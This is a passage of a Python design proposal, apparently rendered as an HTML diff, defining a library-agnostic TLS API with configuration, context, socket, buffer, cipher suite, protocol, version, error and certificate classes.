  1. Configuring TLS, currently implemented by the SSLContext class +in the ssl module.
  2. +
+
    +
  1. Providing an in-memory buffer for doing in-memory encryption or decryption +with no actual I/O (necessary for asynchronous I/O models), currently +implemented by the SSLObject class in the ssl module.
  2. +
+
    +
  1. Wrapping a socket object, currently implemented by the +SSLSocket class in the ssl module.
  2. +
+
    +
  1. Applying TLS configuration to the wrapping objects in (2) and (3). Currently +this is also implemented by the SSLContext class in the ssl module.
  2. +
+
    +
  1. Specifying TLS cipher suites. There is currently no code for doing this in +the standard library: instead, the standard library uses OpenSSL cipher suite +strings.
  2. +
+
    +
  1. Specifying application-layer protocols that can be negotiated during the TLS +handshake.
  2. +
+
    +
  1. Specifying TLS versions.
  2. +
+
    +
  1. Reporting errors to the caller, currently implemented by the +SSLError class in the ssl module.
  2. +
+
    +
  1. Specifying certificates to load, either as client or server certificates.
  2. +
+
    +
  1. Specifying which trust database should be used to validate certificates +presented by a remote peer.
  2. +
+
    +
  1. Finding a way to get hold of these interfaces at run time.
  2. +
+

For the sake of simplicity, this PEP proposes to remove interfaces (3) and (4), +and replace them by a simpler interface that returns a socket which ensures that +all communication through the socket is protected by TLS. In other words, this +interface treats concepts such as socket initialization, the TLS handshake, +Server Name Indication (SNI), etc., as an atomic part of creating a client or +server connection. However, in-memory buffers are still supported, as they are +useful for asynchronous communication.

+

Obviously, (5) doesn’t require a protocol class: instead, it requires a richer +API for configuring supported cipher suites that can be easily updated with +supported cipher suites for different implementations.

+

(9) is a thorny problem, because in an ideal world the private keys associated +with these certificates would never end up in-memory in the Python process +(that is, the TLS library would collaborate with a Hardware Security Module +(HSM) to provide the private key in such a way that it cannot be extracted +from process memory). Thus, we need to provide an extensible model of +providing certificates that allows concrete implementations the ability to +provide this higher level of security, while also allowing a lower bar for +those implementations that cannot. This lower bar would be the same as the +status quo: that is, the certificate may be loaded from an in-memory buffer, +from a file on disk, or additionally referenced by some arbitrary ID +corresponding to a system certificate store.

+

(10) also represents an issue because different TLS implementations vary wildly +in how they allow users to select trust stores. Some implementations have +specific trust store formats that only they can use (such as the OpenSSL CA +directory format that is created by c_rehash), and others may not allow you +to specify a trust store that does not include their default trust store. +On the other hand, most implementations will support some form of loading custom +DER- or PEM-encoded certificates.

+

For this reason, we need to provide a model that assumes very little about the +form that trust stores take, while maintaining type-compatibility with other +implementations. The sections “Certificate”, “Private Keys”, and “Trust Store” +below go into more detail about how this is achieved.

+

Finally, this API will split the responsibilities currently assumed by the +SSLContext object: specifically, the responsibility for holding +and managing configuration and the responsibility for using that configuration +to build buffers or sockets.

+

This is necessary primarily for supporting functionality like Server Name +Indication (SNI). In OpenSSL (and thus in the ssl module), the server has +the ability to modify the TLS configuration in response to the client telling +the server what hostname it is trying to reach. This is mostly used to change +the certificate chain so as to present the correct TLS certificate chain for the +given hostname. The specific mechanism by which this is done is by returning a +new SSLContext object with the appropriate configuration as part +of a user-provided SNI callback function.

+

This is not a model that maps well to other TLS implementations, and puts a +burden on users to write callback functions. Instead, we propose that the +concrete implementations handle SNI transparently for every user after receiving +the relevant certificates.

+

For this reason, we split the responsibility of SSLContext into +two separate objects, which are each split into server and client versions. The +TLSServerConfiguration and TLSClientConfiguration objects act as +containers for a TLS configuration: the ClientContext and ServerContext objects +are instantiated with a TLSClientConfiguration and +TLSServerConfiguration object, respectively, and are used to create buffers +or sockets. All four objects would be immutable.

+
+

Note

+

The following API declarations uniformly use type hints to aid reading.

+
+
+

Configuration

+

The TLSServerConfiguration and TLSClientConfiguration concrete classes +define objects that can hold and manage TLS configuration. The goals of these +classes are as follows:

+
    +
  1. To provide a method of specifying TLS configuration that avoids the risk of +errors in typing (this excludes the use of a simple dictionary).
  2. +
+
    +
  1. To provide an object that can be safely compared to other configuration +objects to detect changes in TLS configuration, for use with the SNI +callback.
  2. +
+

These classes are not protocol classes, primarily because they are not expected to +have implementation-specific behavior. The responsibility for transforming a +TLSServerConfiguration or TLSClientConfiguration object into a useful +set of configurations for a given TLS implementation belongs to the Context +objects discussed below.

+

These classes have one other notable property: they are immutable. This is a +desirable trait for a few reasons. The most important one is that immutability +by default is a good engineering practice. As a side benefit, it allows these +objects to be used as dictionary keys, which is potentially useful for specific +TLS implementations and their SNI configuration. On top of this, it frees +implementations from needing to worry about their configuration objects being +changed under their feet, which allows them to avoid needing to carefully +synchronize changes between their concrete data structures and the configuration +object.

+

These objects are extendable: that is, future releases of Python may add +configuration fields to these objects as they become useful. For +backwards-compatibility purposes, new fields are only appended to these objects. +Existing fields will never be removed, renamed, or reordered. They are split +between client and server to minimize API confusion.

+

The TLSClientConfiguration class would be defined by the following code:

+
class TLSClientConfiguration:
+    __slots__ = (
+        "_certificate_chain",
+        "_ciphers",
+        "_inner_protocols",
+        "_lowest_supported_version",
+        "_highest_supported_version",
+        "_trust_store",
+    )
+
+    def __init__(
+        self,
+        certificate_chain: SigningChain | None = None,
+        ciphers: Sequence[CipherSuite] | None = None,
+        inner_protocols: Sequence[NextProtocol | bytes] | None = None,
+        lowest_supported_version: TLSVersion | None = None,
+        highest_supported_version: TLSVersion | None = None,
+        trust_store: TrustStore | None = None,
+    ) -> None:
+        if inner_protocols is None:
+            inner_protocols = []
+
+        self._certificate_chain = certificate_chain
+        self._ciphers = ciphers
+        self._inner_protocols = inner_protocols
+        self._lowest_supported_version = lowest_supported_version
+        self._highest_supported_version = highest_supported_version
+        self._trust_store = trust_store
+
+    @property
+    def certificate_chain(self) -> SigningChain | None:
+        return self._certificate_chain
+
+    @property
+    def ciphers(self) -> Sequence[CipherSuite | int] | None:
+        return self._ciphers
+
+    @property
+    def inner_protocols(self) -> Sequence[NextProtocol | bytes]:
+        return self._inner_protocols
+
+    @property
+    def lowest_supported_version(self) -> TLSVersion | None:
+        return self._lowest_supported_version
+
+    @property
+    def highest_supported_version(self) -> TLSVersion | None:
+        return self._highest_supported_version
+
+    @property
+    def trust_store(self) -> TrustStore | None:
+        return self._trust_store
+
+
+

The TLSServerConfiguration object is similar to the client one, except that +it takes a Sequence[SigningChain] as the certificate_chain parameter.

+
+
+

Context

+

We define two Context protocol classes. These protocol classes define objects +that allow configuration of TLS to be applied to specific connections. They can +be thought of as factories for TLSSocket and TLSBuffer objects.

+

Unlike the current ssl module, we provide two context classes instead of +one. Specifically, we provide the ClientContext and ServerContext +classes. This simplifies the APIs (for example, there is no sense in the server +providing the server_hostname parameter to +wrap_socket(), but because there is only one context class +that parameter is still available), and ensures that implementations know as +early as possible which side of a TLS connection they will serve. Additionally, +it allows implementations to opt-out of one or either side of the connection.

+

As much as possible implementers should aim to make these classes immutable: +that is, they should prefer not to allow users to mutate their internal state +directly, instead preferring to create new contexts from new TLSConfiguration +objects. Obviously, the protocol classes cannot enforce this constraint, and so +they do not attempt to.

+

The ClientContext protocol class has the following class definition:

+
class ClientContext(Protocol):
+    @abstractmethod
+    def __init__(self, configuration: TLSClientConfiguration) -> None:
+        """Create a new client context object from a given TLS client configuration."""
+        ...
+
+    @property
+    @abstractmethod
+    def configuration(self) -> TLSClientConfiguration:
+        """Returns the TLS client configuration that was used to create the client context."""
+        ...
+
+    @abstractmethod
+    def connect(self, address: tuple[str | None, int]) -> TLSSocket:
+        """Creates a TLSSocket that behaves like a socket.socket, and
+        contains information about the TLS exchange
+        (cipher, negotiated_protocol, negotiated_tls_version, etc.).
+        """
+        ...
+
+    @abstractmethod
+    def create_buffer(self, server_hostname: str) -> TLSBuffer:
+        """Creates a TLSBuffer that acts as an in-memory channel,
+        and contains information about the TLS exchange
+        (cipher, negotiated_protocol, negotiated_tls_version, etc.)."""
+        ...
+
+
+

The ServerContext is similar, taking a TLSServerConfiguration instead.

+
+
+

Socket

+

The context can be used to create sockets, which have to follow the +specification of the TLSSocket protocol class. Specifically, implementations +need to implement the following:

+
    +
  • recv and send
  • +
  • listen and accept
  • +
  • close
  • +
  • getsockname
  • +
  • getpeername
  • +
+

They also need to implement some interfaces that give information about the TLS +connection, such as:

+
    +
  • The underlying context object that was used to create this socket
  • +
  • The negotiated cipher
  • +
  • The negotiated “next” protocol
  • +
  • The negotiated TLS version
  • +
+

The following code describes these functions in more detail:

+
class TLSSocket(Protocol):
+    """This class implements a socket.socket-like object that creates an OS
+    socket, wraps it in an SSL context, and provides read and write methods
+    over that channel."""
+
+    @abstractmethod
+    def __init__(self, *args: tuple, **kwargs: tuple) -> None:
+        """TLSSockets should not be constructed by the user.
+        The implementation should implement a method to construct a TLSSocket
+        object and call it in ClientContext.connect() and
+        ServerContext.connect()."""
+        ...
+
+    @abstractmethod
+    def recv(self, bufsize: int) -> bytes:
+        """Receive data from the socket. The return value is a bytes object
+        representing the data received. Should not work before the handshake
+        is completed."""
+        ...
+
+    @abstractmethod
+    def send(self, bytes: bytes) -> int:
+        """Send data to the socket. The socket must be connected to a remote socket."""
+        ...
+
+    @abstractmethod
+    def close(self, force: bool = False) -> None:
+        """Shuts down the connection and mark the socket closed.
+        If force is True, this method should send the close_notify alert and shut down
+        the socket without waiting for the other side.
+        If force is False, this method should send the close_notify alert and raise
+        the WantReadError exception until a corresponding close_notify alert has been
+        received from the other side.
+        In either case, this method should return WantWriteError if sending the
+        close_notify alert currently fails."""
+        ...
+
+    @abstractmethod
+    def listen(self, backlog: int) -> None:
+        """Enable a server to accept connections. If backlog is specified, it
+        specifies the number of unaccepted connections that the system will allow
+        before refusing new connections."""
+        ...
+
+    @abstractmethod
+    def accept(self) -> tuple[TLSSocket, tuple[str | None, int]]:
+        """Accept a connection. The socket must be bound to an address and listening
+        for connections. The return value is a pair (conn, address) where conn is a
+        new TLSSocket object usable to send and receive data on the connection, and
+        address is the address bound to the socket on the other end of the connection."""
+        ...
+
+    @abstractmethod
+    def getsockname(self) -> tuple[str | None, int]:
+        """Return the local address to which the socket is connected."""
+        ...
+
+    @abstractmethod
+    def getpeercert(self) -> bytes | None:
+        """
+        Return the raw DER bytes of the certificate provided by the peer
+        during the handshake, if applicable.
+        """
+        ...
+
+    @abstractmethod
+    def getpeername(self) -> tuple[str | None, int]:
+        """Return the remote address to which the socket is connected."""
+        ...
+
+    @property
+    @abstractmethod
+    def context(self) -> ClientContext | ServerContext:
+        """The ``Context`` object this socket is tied to."""
+        ...
+
+    @abstractmethod
+    def cipher(self) -> CipherSuite | int | None:
+        """
+        Returns the CipherSuite entry for the cipher that has been negotiated on the connection.
+
+        If no connection has been negotiated, returns ``None``. If the cipher negotiated is not
+        defined in CipherSuite, returns the 16-bit integer representing that cipher directly.
+        """
+        ...
+
+    @abstractmethod
+    def negotiated_protocol(self) -> NextProtocol | bytes | None:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+
+        This selection may have been made using ALPN or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def negotiated_tls_version(self) -> TLSVersion | None:
+        """The version of TLS that has been negotiated on this connection."""
+        ...
+
+
+
+
+

Buffer

+

The context can also be used to create buffers, which have to follow the +specification of the TLSBuffer protocol class. Specifically, implementations +need to implement the following:

+
    +
  • read and write
  • +
  • do_handshake
  • +
  • shutdown
  • +
  • process_incoming and process_outgoing
  • +
  • incoming_bytes_buffered and outgoing_bytes_buffered
  • +
  • getpeercert
  • +
+

Similarly to the socket case, they also need to implement some interfaces that +give information about the TLS connection, such as:

+
    +
  • The underlying context object that was used to create this buffer
  • +
  • The negotiated cipher
  • +
  • The negotiated “next” protocol
  • +
  • The negotiated TLS version
  • +
+

The following code describes these functions in more detail:

+
class TLSBuffer(Protocol):
+    """This class implements an in memory-channel that creates two buffers,
+    wraps them in an SSL context, and provides read and write methods over
+    that channel."""
+
+    @abstractmethod
+    def read(self, amt: int, buffer: Buffer | None) -> bytes | int:
+        """
+        Read up to ``amt`` bytes of data from the input buffer and return
+        the result as a ``bytes`` instance. If an optional buffer is
+        provided, the result is written into the buffer and the number of
+        bytes is returned instead.
+
+        Once EOF is reached, all further calls to this method return the
+        empty byte string ``b''``.
+
+        May read "short": that is, fewer bytes may be returned than were
+        requested.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to ``read()``
+        can also cause write operations.
+        """
+        ...
+
+    @abstractmethod
+    def write(self, buf: Buffer) -> int:
+        """
+        Write ``buf`` in encrypted form to the output buffer and return the
+        number of bytes written. The ``buf`` argument must be an object
+        supporting the buffer interface.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read. In either
+        case, users should endeavour to resolve that situation and then
+        re-call this method. When re-calling this method users *should*
+        re-use the exact same ``buf`` object, as some implementations require that
+        the exact same buffer be used.
+
+        This operation may write "short": that is, fewer bytes may be
+        written than were in the buffer.
+
+        As at any time a re-negotiation is possible, a call to ``write()``
+        can also cause read operations.
+        """
+        ...
+
+    @abstractmethod
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification.
+        """
+        ...
+
+    @abstractmethod
+    def cipher(self) -> CipherSuite | int | None:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+        ...
+
+    @abstractmethod
+    def negotiated_protocol(self) -> NextProtocol | bytes | None:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def context(self) -> ClientContext | ServerContext:
+        """
+        The ``Context`` object this buffer is tied to.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def negotiated_tls_version(self) -> TLSVersion | None:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+        ...
+
+    @abstractmethod
+    def shutdown(self) -> None:
+        """
+        Performs a clean TLS shut down. This should generally be used
+        whenever possible to signal to the remote peer that the content is
+        finished.
+        """
+        ...
+
+    @abstractmethod
+    def process_incoming(self, data_from_network: bytes) -> None:
+        """
+        Receives some TLS data from the network and stores it in an
+        internal buffer.
+
+        If the internal buffer is overfull, this method will raise
+        ``WantReadError`` and store no data. At this point, the user must
+        call ``read`` to remove some data from the internal buffer
+        before repeating this call.
+        """
+        ...
+
+    @abstractmethod
+    def incoming_bytes_buffered(self) -> int:
+        """
+        Returns how many bytes are in the incoming buffer waiting to be processed.
+        """
+        ...
+
+    @abstractmethod
+    def process_outgoing(self, amount_bytes_for_network: int) -> bytes:
+        """
+        Returns the next ``amt`` bytes of data that should be written to
+        the network from the outgoing data buffer, removing it from the
+        internal buffer.
+        """
+        ...
+
+    @abstractmethod
+    def outgoing_bytes_buffered(self) -> int:
+        """
+        Returns how many bytes are in the outgoing buffer waiting to be sent.
+        """
+        ...
+
+    @abstractmethod
+    def getpeercert(self) -> bytes | None:
+        """
+        Return the raw DER bytes of the certificate provided by the peer
+        during the handshake, if applicable.
+        """
+        ...
+
+
+
+
+

Cipher Suites

+

Supporting cipher suites in a truly library-agnostic fashion is a remarkably +difficult undertaking. Different TLS implementations often have radically +different APIs for specifying cipher suites, but more problematically these APIs +frequently differ in capability as well as in style.

+

Below are examples of different cipher suite selection APIs. These examples are +not intended to obligate implementation against each API, only to illuminate the +constraints imposed by each.

+
+
OpenSSL
+

OpenSSL uses a well-known cipher string format. This format has been adopted as +a configuration language by most products that use OpenSSL, including Python. +This format is relatively easy to read, but has a number of downsides: it is a +string, which makes it easy to provide bad inputs; it lacks much +detailed validation, meaning that it is possible to configure OpenSSL in a way +that doesn’t allow it to negotiate any cipher at all; and it allows specifying +cipher suites in a number of different ways that make it tricky to parse. The +biggest problem with this format is that there is no formal specification for +it, meaning that the only way to parse a given string the way OpenSSL would is +to get OpenSSL to parse it.

+

OpenSSL’s cipher strings can look like this:

+
"ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5"
+
+
+

This string demonstrates some of the complexity of the OpenSSL format. For +example, it is possible for one entry to specify multiple cipher suites: the +entry ECDH+AESGCM means “all ciphers suites that include both elliptic-curve +Diffie-Hellman key exchange and AES in Galois Counter Mode”. More explicitly, +that will expand to four cipher suites:

+
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
+
+
+

That makes parsing a complete OpenSSL cipher string extremely tricky. Add to the +fact that there are other meta-characters, such as “!” (exclude all cipher +suites that match this criterion, even if they would otherwise be included: +“!MD5” means that no cipher suites using the MD5 hash algorithm should be +included), “-” (exclude matching ciphers if they were already included, but +allow them to be re-added later if they get included again), and “+” (include +the matching ciphers, but place them at the end of the list), and you get an +extremely complex format to parse. On top of this complexity it should be noted +that the actual result depends on the OpenSSL version, as an OpenSSL cipher +string is valid so long as it contains at least one cipher that OpenSSL +recognizes.

+

OpenSSL also uses different names for its ciphers than the names used in the +relevant specifications. See the manual page for ciphers(1) for more +details.

+

The actual API inside OpenSSL for the cipher string is simple:

+
char *cipher_list = <some cipher list>;
+int rc = SSL_CTX_set_cipher_list(context, cipher_list);
+
+
+

This means that any format that is used by this module must be able to be +converted to an OpenSSL cipher string for use with OpenSSL.

+
+
+
Network Framework
+

Network Framework is the macOS (10.15+) system TLS library. This library is +substantially more restricted than OpenSSL in many ways, as it has a much more +restricted class of users. One of these substantial restrictions is in +controlling supported cipher suites.

+

Ciphers in Network Framework are represented by a Objective-C uint16_t enum. +This enum has one entry per cipher suite, with no aggregate entries, meaning +that it is not possible to reproduce the meaning of an OpenSSL cipher string +like “ECDH+AESGCM” without hand-coding which categories each enum member +falls into.

+

However, the names of most of the enum members are in line with the formal names +of the cipher suites: that is, the cipher suite that OpenSSL calls +“ECDHE-ECDSA-AES256-GCM-SHA384” is called +“tls_ciphersuite_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384” in Network Framework.

+

The API for configuring cipher suites inside Network Framework is simple:

+
void sec_protocol_options_append_tls_ciphersuite(sec_protocol_options_t options, tls_ciphersuite_t ciphersuite);
+
+
+
+
+
SChannel
+

SChannel is the Windows system TLS library.

+

SChannel has extremely restrictive support for controlling available TLS cipher +suites, and additionally adopts a third method of expressing what TLS cipher +suites are supported.

+

Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints). +Each of these constants does not refer to an entire cipher suite, but instead an +individual algorithm. Some examples are CALG_3DES and CALG_AES_256, +which refer to the bulk encryption algorithm used in a cipher suite, +CALG_ECDH_EPHEM and CALG_RSA_KEYX which refer to part of the key +exchange algorithm used in a cipher suite, CALG_SHA_256 and CALG_SHA_384 +which refer to the message authentication code used in a cipher suite, and +CALG_ECDSA and CALG_RSA_SIGN which refer to the signing portions of the +key exchange algorithm.

+

In earlier versions of the SChannel API, these constants were used to define the +algorithms that could be used. The latest version, however, uses these constants +to prohibit which algorithms can be used.

+

This can be thought of as the half of OpenSSL’s functionality that Network +Framework doesn’t have: Network Framework only allows specifying exact cipher +suites (and a limited number of pre-defined cipher suite groups), whereas +SChannel only allows specifying parts of the cipher suite, while OpenSSL allows +both.

+

Determining which cipher suites are allowed on a given connection is done by +providing a pointer to an array of these ALG_ID constants. This means that +any suitable API must allow the Python code to determine which ALG_ID +constants must be provided.

+
+
+
Network Security Services (NSS)
+

NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird, and +as an alternative to OpenSSL in multiple libraries, e.g. curl.

+

By default, NSS comes with secure configuration of allowed ciphers. On some +platforms such as Fedora, the list of enabled ciphers is globally configured in +a system policy. Generally, applications should not modify cipher suites unless +they have specific reasons to do so.

+

NSS has both process global and per-connection settings for cipher suites. It +does not have a concept of SSLContext like OpenSSL. A +SSLContext-like behavior can be easily emulated. Specifically, +ciphers can be enabled or disabled globally with +SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled), and +SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled) for a +connection. The cipher PRInt32 number is a signed 32-bit integer that +directly corresponds to an registered IANA id, e.g. 0x1301 is +TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order of ciphers +is fixed and cannot be modified at runtime.

+

Like Network Framework, NSS has no API for aggregated entries. Some consumers of +NSS have implemented custom mappings from OpenSSL cipher names and rules to NSS +ciphers, e.g. mod_nss.

+
+
+
Proposed Interface
+

The proposed interface for the new module is influenced by the combined set of +limitations of the above implementations. Specifically, as every implementation +except OpenSSL requires that each individual cipher be provided, there is no +option but to provide that lowest common denominator approach.

+

The simplest approach is to provide an enumerated type that includes a large +subset of the cipher suites defined for TLS. The values of the enum members will +be their two-octet cipher identifier as used in the TLS handshake, stored as a +16 bit integer. The names of the enum members will be their IANA-registered +cipher suite names.

+

As of now, the IANA cipher suite registry +contains over 320 cipher suites. A large portion of the cipher suites are +irrelevant for TLS connections to network services. Other suites specify +deprecated and insecure algorithms that are no longer provided by recent +versions of implementations. The enum contains the five fixed cipher suites +defined for TLS v1.3. For TLS v1.2, it only contains the cipher suites that +correspond to the TLS v1.3 cipher suites, with ECDHE key exchange (for perfect +forward secrecy) and ECDSA or RSA signatures, which are an additional ten cipher +suites.

+

In addition to this enum, the interface defines a default cipher suite list for +TLS v1.2, which includes only those defined cipher suites based on AES-GCM or +ChaCha20-Poly1305. The default cipher suite list for TLS v1.3 will +comprise the five cipher suites defined in the specification.

+

The current enum is quite restricted, including only cipher suites that provide +forward secrecy. Because the enum doesn’t contain every defined cipher, and also +to allow for forward-looking applications, all parts of this API that accept +CipherSuite objects will also accept raw 16-bit integers directly.

+
class CipherSuite(IntEnum):
+    """
+    Known cipher suites.
+
+    See: <https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml>
+    """
+
+    TLS_AES_128_GCM_SHA256 = 0x1301
+    TLS_AES_256_GCM_SHA384 = 0x1302
+    TLS_CHACHA20_POLY1305_SHA256 = 0x1303
+    TLS_AES_128_CCM_SHA256 = 0x1304
+    TLS_AES_128_CCM_8_SHA256 = 0x1305
+    TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B
+    TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C
+    TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F
+    TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xC0AC
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xC0AD
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xC0AE
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xC0AF
+    TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8
+    TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9
+
+
+

For Network Framework, these enum members directly refer to the values of the +cipher suite constants. For example, Network Framework defines the cipher suite +enum member tls_ciphersuite_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having +the value 0xC02C. Not coincidentally, that is identical to its value in the +above enum. This makes mapping between Network Framework and the above enum very +easy indeed.

+

For SChannel there is no easy direct mapping, due to the fact that SChannel +configures ciphers, instead of cipher suites. This represents an ongoing concern +with SChannel, which is that it is very difficult to configure in a specific +manner compared to other TLS implementations.

+

For the purposes of this PEP, any SChannel implementation will need to determine +which ciphers to choose based on the enum members. This may be more open than +the actual cipher suite list actually wants to allow, or it may be more +restrictive, depending on the choices of the implementation. This PEP recommends +that it be more restrictive, but of course this cannot be enforced.

+

Finally, we expect that for most users, secure defaults will be enough. When +specifying no list of ciphers, the implementations should use secure defaults +(possibly derived from system recommended settings).

+
+
+
+

Protocol Negotiation

+

ALPN allows for protocol negotiation as part of the HTTP/2 handshake. While ALPN +is at a fundamental level built on top of bytestrings, string-based APIs are +frequently problematic as they allow for errors in typing that can be hard to +detect.

+

For this reason, this module will define a type that protocol negotiation +implementations can pass and be passed. This type would wrap a bytestring to +allow for aliases for well-known protocols. This allows us to avoid the problems +inherent in typos for well-known protocols, while allowing the full +extensibility of the protocol negotiation layer if needed by letting users pass +byte strings directly.

+
class NextProtocol(Enum):
+    """The underlying negotiated ("next") protocol."""
+
+    H2 = b"h2"
+    H2C = b"h2c"
+    HTTP1 = b"http/1.1"
+    WEBRTC = b"webrtc"
+    C_WEBRTC = b"c-webrtc"
+    FTP = b"ftp"
+    STUN = b"stun.nat-discovery"
+    TURN = b"stun.turn"
+
+
+
+
+

TLS Versions

+

It is often useful to be able to restrict the versions of TLS you’re willing to +support. There are many security advantages in refusing to use old versions of +TLS, and some misbehaving servers will mishandle TLS clients advertising support +for newer versions.

+

The following enumerated type can be used to gate TLS versions. Forward-looking +applications should almost never set a maximum TLS version unless they +absolutely must, as a TLS implementation that is newer than the Python that uses +it may support TLS versions that are not in this enumerated type.

+

Additionally, this enumerated type defines two additional flags that can always +be used to request either the lowest or highest TLS version supported by an +implementation. As for cipher suites, we expect that for most users, secure +defaults will be enough. When specifying no list of TLS versions, the +implementations should use secure defaults (possibly derived from system +recommended settings).

+
class TLSVersion(Enum):
+    """
+    TLS versions.
+
+    The `MINIMUM_SUPPORTED` and `MAXIMUM_SUPPORTED` variants are "open ended",
+    and refer to the "lowest mutually supported" and "highest mutually supported"
+    TLS versions, respectively.
+    """
+
+    MINIMUM_SUPPORTED = "MINIMUM_SUPPORTED"
+    TLSv1_2 = "TLSv1.2"
+    TLSv1_3 = "TLSv1.3"
+    MAXIMUM_SUPPORTED = "MAXIMUM_SUPPORTED"
+
+
+
+
+

Errors

+

This module would define four base classes for use with error handling. Unlike +many of the other classes defined here, these classes are not abstract, as they +have no behavior. They exist simply to signal certain common behaviors. TLS +implementations should subclass these exceptions in their own packages, but +needn’t define any behavior for them.

+

In general, concrete implementations should subclass these exceptions rather +than throw them directly. This makes it moderately easier to determine which +concrete TLS implementation is in use during debugging of unexpected errors. +However, this is not mandatory.

+

The definitions of the errors are below:

+
class TLSError(Exception):
+    """
+    The base exception for all TLS related errors from any implementation.
+
+    Catching this error should be sufficient to catch *all* TLS errors,
+    regardless of what implementation is used.
+    """
+
+
+class WantWriteError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or buffer-only I/O is used.
+
+    This error signals that the requested
+    operation cannot complete until more data is written to the network,
+    or until the output buffer is drained.
+
+    This error is should only be raised when it is completely impossible
+    to write any data. If a partial write is achievable then this should
+    not be raised.
+    """
+
+
+class WantReadError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or buffer-only I/O is used.
+
+    This error signals that the requested
+    operation cannot complete until more data is read from the network, or
+    until more data is available in the input buffer.
+
+    This error should only be raised when it is completely impossible to
+    write any data. If a partial write is achievable then this should not
+    be raised.
+    """
+
+
+class RaggedEOF(TLSError):
+    """A special signaling exception used when a TLS connection has been
+    closed gracelessly: that is, when a TLS CloseNotify was not received
+    from the peer before the underlying TCP socket reached EOF. This is a
+    so-called "ragged EOF".
+
+    This exception is not guaranteed to be raised in the face of a ragged
+    EOF: some implementations may not be able to detect or report the
+    ragged EOF.
+
+    This exception is not always a problem. Ragged EOFs are a concern only
+    when protocols are vulnerable to length truncation attacks. Any
+    protocol that can detect length truncation attacks at the application
+    layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
+    attack and so can ignore this exception.
+    """
+
+
+class ConfigurationError(TLSError):
+    """An special exception that implementations can use when the provided
+    configuration uses features not supported by that implementation."""
+
+
+
+
+

Certificates

+

This module would define a concrete certificate class. This class would have +almost no behavior, as the goal of this module is not to provide all possible +relevant cryptographic functionality that could be provided by X.509 +certificates. Instead, all we need is the ability to signal the source of a +certificate to a concrete implementation.

+

For that reason, this certificate class defines three attributes, corresponding +to the three envisioned constructors: certificates from files, certificates from +memory, or certificates from arbitrary identifiers. It is possible that +implementations do not support all of these constructors, and they can +communicate this to users as described in the “Runtime” section below. +Certificates from arbitrary identifiers, in particular, are expected to be +useful primarily to users seeking to build integrations on top of HSMs, TPMs, +SSMs, and similar.

+

Specifically, this class does not parse any provided input to validate that it +is a correct certificate, and also does not provide any form of introspection +into a particular certificate. TLS implementations are not required to provide +such introspection either. Peer certificates that are received during the +handshake are provided as raw DER bytes.

+
class Certificate:
+    """Object representing a certificate used in TLS."""
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike[str] | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a Certificate object from a path, buffer, or ID.
+
+        If none of these is given, an exception is raised.
+        """
+
+        if buffer is None and path is None and id is None:
+            raise ValueError("Certificate cannot be empty.")
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
